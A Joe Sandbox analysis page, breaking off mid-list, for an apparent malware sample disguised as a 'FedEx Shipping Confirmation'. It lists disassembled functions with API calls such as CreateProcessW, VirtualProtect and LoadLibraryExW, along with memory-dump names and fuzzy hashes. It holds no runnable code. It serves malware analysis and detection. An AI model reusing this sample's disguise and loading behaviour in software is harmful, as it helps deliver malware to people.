Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D

Function 00405AA8 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00405AEA
GetLastError.KERNEL32 ref: 00405AF8

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction ID: 13352011552d0ddc4b0c1568d720dcd5f2ba617a9a750a7f60e40e4c0ab4bb23
Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction Fuzzy Hash: 52F0F4B0D0060EDADB00CFA4C6487EFBBB4AB04309F10812AD941B6281D7B882488FA9

Function 00405B37 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
CloseHandle.KERNEL32(?), ref: 00405B6D

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
Instruction ID: e42c3092a0fd4a031c4fd4b3b8927d6f3122727aa63034fdce6a98e2e8d9435a
Opcode Fuzzy Hash: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
Instruction Fuzzy Hash: ECE09AB4900249BFEB109F64AD05E7B776CE745644F008525BD10F6151D775A8148A79

Function 00406948 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C), ref: 0040695A
GetProcAddress.KERNEL32(00000000,?), ref: 00406975

Part of subcall function 004068D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
Part of subcall function 004068D8: wsprintfW.USER32 ref: 0040692A
Part of subcall function 004068D8: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040693E

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: 551f93d59f6a57a7cc32b559d7ebc8a6d8da67cd5dc02587d5b4d2bd1ffdf244
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: 95E08673504310AAD2105A705E04C2B73B89F85740302443EF942F2140D734DC32E769

Function 00405B02 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405B16

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 7bb2d1eb449126eed485e4eb4fbdbafbf981390ed288ef949080c13de55397a1
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 7CC08C30314902DADA802B209F0870B3A60AB80340F154439A582E00E4CA30A445C92D

Function 6ED22B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 6ED22C57

Memory Dump Source

Source File: 00000001.00000002.3344883399.000000006ED21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6ED20000, based on PE: true

Associated: 00000001.00000002.3344832397.000000006ED20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344933338.000000006ED24000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344985953.000000006ED26000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ed20000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2d1bc28379c912c1599611378a12394c233d8f8077ba4fe4cee6b7fdbcef05d9
Instruction ID: 8c8fd8d046e01011f33225b7741162b4c4079cc1acf92801b681901b3e88f64b
Opcode Fuzzy Hash: 2d1bc28379c912c1599611378a12394c233d8f8077ba4fe4cee6b7fdbcef05d9
Instruction Fuzzy Hash: F3415C71920604DFEB209FA4DE85F9937B8EB4532CF208835F7058B118D73A95829BA2

Function 004060C7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,004034E4,?,?,0040332B,?,00000004,00000000,00000000,00000000), ref: 004060DB

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: 1a6ac9c2f17c3bf7024e7b579d6ce6ab3b84958f313ea5b4b1ce89539a84cc3a
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 55E0EC3225026AABDF10DE55DC00EEB7BACEB053A0F018437F956E7150DA31E93197A8

Function 004060F6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,0040349A,?,00793700,?,00793700,?,?,00000004,00000000), ref: 0040610A

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 280cd4c212b49affc14266408846aa3a30e7e9a640caac8a44b81d30c287abca
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: E1E08C3221025AABCF109E908C01EEB7B6CEB043A0F014433FD16EB051D230E8319BA8

Function 6ED22A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6ED2505C,00000004,00000040,6ED2504C), ref: 6ED22A9D

Memory Dump Source

Source File: 00000001.00000002.3344883399.000000006ED21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6ED20000, based on PE: true

Associated: 00000001.00000002.3344832397.000000006ED20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344933338.000000006ED24000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344985953.000000006ED26000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ed20000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e6ca44973f12046b711e097acd24c7532c33fd645d20ff1bd2933dbdce00afd6
Instruction ID: 1cd3fe49a2a59a5a0356b9c55eb2c78064d45d013bd1b581e3d2245591c009ae
Opcode Fuzzy Hash: e6ca44973f12046b711e097acd24c7532c33fd645d20ff1bd2933dbdce00afd6
Instruction Fuzzy Hash: 0EF0A5B0914A80DEEB50CF688F44F093FE0B70A318B14452AE349DE248E334444ACBA7

Function 004063C1 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040644F,?,?,?,?,Call,?,00000000), ref: 004063E5

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: e359b3f9d4e5954a9af9fcfc08987e0780d6658b6568ce36bf776d9a1ed3ba47
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 5AD0123210020DBBDF115F90AD01FAB771DAB08310F014826FE17E40D0D775D530A7A4

Function 0040451F Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00404531

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
Instruction ID: 80e323bcaa4fb1d2d6ad7f8777a1edc32b6b0207238f0482179e9273dd0660e4
Opcode Fuzzy Hash: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
Instruction Fuzzy Hash: 10C09BB57443007BDA149B509E45F17776467D4741F14C5797340F50F0C774E450D62C

Function 004034E7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00403267,?), ref: 004034F5

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 00404508 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,?,00404333), ref: 00404516

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
